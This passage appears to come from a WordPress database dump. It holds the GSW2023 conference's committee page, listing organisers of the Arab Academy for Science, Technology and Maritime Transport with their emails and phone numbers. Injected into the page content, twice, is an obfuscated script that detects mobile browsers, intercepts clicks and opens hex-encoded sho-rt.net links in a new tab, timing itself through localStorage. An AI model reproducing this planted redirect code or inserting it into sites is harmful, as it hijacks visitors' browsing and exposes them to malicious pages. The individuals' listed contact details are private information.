_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-08-13 20:10:01','2023-08-13 20:10:01','',4849,'https://gsw2023.com/?p=5162',0,'revision','',0),
(5163,1,'2023-08-13 20:12:20','2023-08-13 20:12:20','[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@gsw2023.com\"> aaelbary@gsw2023.com </a></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:gsw2023@aast.edu\"> gsw2023@aast.edu </a></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: <a href=\"tel:+2035497598\">+203 5497598</a></td>\r\n<td style=\"width: 26%;\">Fax: <a href=\"tel:+2035497598\"> +203 5497598 </a></td>\r\n<td style=\"width: 26%;\">Mobile: <a href=\"tel:+201007382198\"> +20 100 7382 198 </a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span>\r\n<span style=\"font-size: 9pt;\"><a href=\"mailto:nashwa.elbendary@aast.edu\"> nashwa.elbendary@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+201227217550 </a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:ymohasseb@aast.edu\"> ymohasseb@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+ 201227217550 </a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"alignnone wp-image-5160\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/zaki-212x300.jpg\" alt=\"\" width=\"108\" height=\"153\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:amzak10@aast.edu\"> amzak10@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201006619608\">+201006619608</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"wp-image-5159 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/dr-radwa-267x300.jpg\" alt=\"\" width=\"198\" height=\"223\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:radwa.ahmed@aast.edu\">radwa.ahmed@aast.edu</a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201001552854\">+201001552854</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688949164622{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><strong>IT Affairs</strong></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688129113852{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ayman_elzagh.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Research Eng. Ayman Elzagh</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Web Director\r\nGSW2023, Egypt\r\n<span style=\"font-size: 11pt;\"><a href=\"mailto:ayzagh@aast.edu\">ayzagh@aast.edu</a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201210007979\">+201210007979</a></span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span>\r\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span>\r\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Security Engineer</span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto: nagy@aast.edu\"> nagy@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201141606029\">+201141606029</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong>\r\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\r\n\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span>\r\nDirector of Events and conferences Department\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>Email:</td>\r\n<td>yasserelrashidi@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td>Mobile:</td>\r\n<td>+201270059999</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span>\r\nLocal financial Director, GSW2023, Egypt\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>Email:</td>\r\n<td>mohamed_abdallah20102002@yahoo.com</td>\r\n</tr>\r\n<tr>\r\n<td>Mobile:</td>\r\n<td>+201141401861</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows 